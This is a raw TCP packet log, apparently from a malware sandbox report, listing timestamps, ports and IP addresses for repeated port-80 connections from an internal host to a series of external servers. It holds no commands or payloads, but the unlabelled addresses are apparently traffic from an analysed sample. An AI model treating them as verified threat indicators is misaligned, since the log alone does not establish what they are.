                                                                                                                                                                                Nov 29, 2024 09:16:31.873907089 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:31.873919010 CET8049814185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:31.874001980 CET4981480192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:32.091387987 CET4981480192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:33.110111952 CET4982080192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:33.231136084 CET8049820185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:33.231219053 CET4982080192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:33.240598917 CET4982080192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:33.360579014 CET8049820185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:34.787221909 CET8049820185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:34.787237883 CET8049820185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:34.787529945 CET4982080192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:34.790318012 CET4982080192.168.2.4185.27.134.206
                                                                                                                                                                                Nov 29, 2024 09:16:34.910202026 CET8049820185.27.134.206192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:50.073893070 CET4986080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:50.193773985 CET8049860104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:50.197947979 CET4986080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:50.228120089 CET4986080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:50.348087072 CET8049860104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:51.341444016 CET8049860104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:51.342473984 CET8049860104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:51.342534065 CET4986080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:51.732101917 CET4986080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:52.751377106 CET4986680192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:52.871417046 CET8049866104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:52.871493101 CET4986680192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:52.890108109 CET4986680192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:53.010051966 CET8049866104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:54.018141985 CET8049866104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:54.018254995 CET8049866104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:54.018390894 CET4986680192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:54.404139996 CET4986680192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:55.423257113 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:55.581598043 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.581679106 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:55.600591898 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:55.720676899 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720706940 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720817089 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720860004 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720931053 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720990896 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.721045971 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.721100092 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.721210003 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:56.776603937 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:56.777483940 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:56.777530909 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:57.107342005 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.125686884 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.245691061 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:58.245805025 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.256155968 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.376055956 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:59.486824989 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:59.486989021 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:59.487231016 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:59.495687962 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:59.615638018 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:05.121393919 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:05.241970062 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:05.242077112 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:05.337042093 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:05.457081079 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:06.465441942 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:06.465667963 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:06.465786934 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:06.841686010 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:07.904395103 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:08.024297953 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:08.024471998 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:08.059864044 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:08.179884911 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:09.250885963 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:09.251125097 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:09.251168013 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:09.607075930 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.667865992 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.787842035 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.787940979 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.858763933 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.978920937 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.978940010 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979043007 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979131937 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979140997 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979150057 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979202986 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979219913 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979291916 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:12.133003950 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:12.133155107 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:12.133235931 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:12.372697115 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.457156897 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.577223063 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:13.577292919 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.600614071 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.720669985 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:14.845067978 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:14.845180988 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:14.845227957 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:14.848242044 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:14.968106031 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:20.294356108 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:20.414383888 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:20.414522886 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:20.429390907 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:20.549349070 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:21.789715052 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:21.789936066 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:21.791970968 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:21.935185909 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:22.954293013 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:23.074197054 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:23.074312925 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:23.088888884 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:23.208812952 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:24.445173979 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:24.445246935 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:24.445342064 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:24.591877937 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.610284090 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.731245995 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.733978987 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.751926899 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.872107983 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872121096 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872160912 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872169971 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872456074 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872489929 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872579098 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872595072 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872643948 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:27.058898926 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:27.059691906 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:27.059743881 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:27.263617039 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.282181978 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.402112007 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:28.402415037 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.411917925 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:28.531969070 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:29.730864048 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:29.730938911 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:29.731035948 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:29.733640909 CET4995280192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:29.853533983 CET8049952176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:35.218643904 CET4996680192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:35.338710070 CET8049966161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:35.338794947 CET4996680192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:35.359877110 CET4996680192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:35.479967117 CET8049966161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:36.629502058 CET8049966161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:36.629571915 CET8049966161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:36.629582882 CET8049966161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:36.629842997 CET4996680192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:36.872745037 CET4996680192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:37.893932104 CET4997280192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:38.014059067 CET8049972161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:38.022303104 CET4997280192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:38.034024954 CET4997280192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:38.154186010 CET8049972161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:39.271941900 CET8049972161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:39.271990061 CET8049972161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:39.272033930 CET4997280192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:39.272125006 CET8049972161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:39.272169113 CET4997280192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:39.544774055 CET4997280192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:40.563436031 CET4997780192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:40.683500051 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.683634996 CET4997780192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:40.698936939 CET4997780192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:40.820847988 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.820952892 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.820962906 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.820971012 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.821119070 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.821129084 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.821264982 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.821274042 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:40.821281910 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:41.927083969 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:41.927114010 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:41.927367926 CET4997780192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:42.008023024 CET8049977161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:42.010118008 CET4997780192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:42.200859070 CET4997780192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:43.220395088 CET4998380192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:43.341742039 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:43.341823101 CET4998380192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:43.352437973 CET4998380192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:43.472376108 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:44.585321903 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:44.585339069 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:44.585351944 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:44.585459948 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:44.585535049 CET4998380192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:44.585536003 CET4998380192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:44.590017080 CET4998380192.168.2.4161.97.168.245
                                                                                                                                                                                Nov 29, 2024 09:17:44.709932089 CET8049983161.97.168.245192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:51.035748005 CET5000280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:51.155725002 CET8050002103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:51.155805111 CET5000280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:51.175553083 CET5000280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:51.295542002 CET8050002103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:52.685235977 CET5000280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:52.806350946 CET8050002103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:52.806442976 CET5000280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:53.704226971 CET5000780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:53.824352980 CET8050007103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:53.826163054 CET5000780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:53.840315104 CET5000780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:53.960364103 CET8050007103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:55.341485977 CET5000780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:55.461942911 CET8050007103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:55.462006092 CET5000780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:56.362023115 CET5001280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:56.482006073 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.486190081 CET5001280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:56.507061958 CET5001280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:56.627403975 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627425909 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627564907 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627607107 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627736092 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627754927 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627829075 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627846956 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:56.627944946 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:58.013935089 CET5001280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:58.134387970 CET8050012103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:58.134524107 CET5001280192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:59.033308029 CET5001780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:59.154752970 CET8050017103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:59.154834032 CET5001780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:59.166904926 CET5001780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:17:59.286978006 CET8050017103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:00.879511118 CET8050017103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:00.879605055 CET8050017103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:00.879697084 CET5001780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:18:00.879775047 CET8050017103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:00.879821062 CET5001780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:18:00.883088112 CET5001780192.168.2.4103.75.185.22
                                                                                                                                                                                Nov 29, 2024 09:18:01.003108978 CET8050017103.75.185.22192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:06.463429928 CET5001880192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:06.583450079 CET8050018155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:06.583673000 CET5001880192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:06.598763943 CET5001880192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:06.718727112 CET8050018155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:07.839596033 CET8050018155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:07.839739084 CET8050018155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:07.842523098 CET5001880192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:08.110218048 CET5001880192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:09.126302958 CET5001980192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:09.246387005 CET8050019155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:09.246475935 CET5001980192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:09.264436960 CET5001980192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:09.384402990 CET8050019155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:10.557490110 CET8050019155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:10.557507992 CET8050019155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:10.558204889 CET5001980192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:10.782228947 CET5001980192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:11.798748970 CET5002080192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:11.918840885 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:11.922600985 CET5002080192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:11.938196898 CET5002080192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058320999 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058332920 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058433056 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058443069 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058547020 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058564901 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058665991 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058682919 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:12.058732986 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:13.133554935 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:13.133577108 CET8050020155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:13.133640051 CET5002080192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:13.450932980 CET5002080192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:14.470136881 CET5002180192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:14.590085030 CET8050021155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:14.594011068 CET5002180192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:14.605983019 CET5002180192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:14.725981951 CET8050021155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:15.858202934 CET8050021155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:15.858366013 CET8050021155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:15.858592033 CET5002180192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:15.861283064 CET5002180192.168.2.4155.94.253.4
                                                                                                                                                                                Nov 29, 2024 09:18:15.981323957 CET8050021155.94.253.4192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:21.514044046 CET5002280192.168.2.4208.91.197.27
                                                                                                                                                                                Nov 29, 2024 09:18:21.634033918 CET8050022208.91.197.27192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:18:21.634118080 CET5002280192.168.2.4208.91.197.27
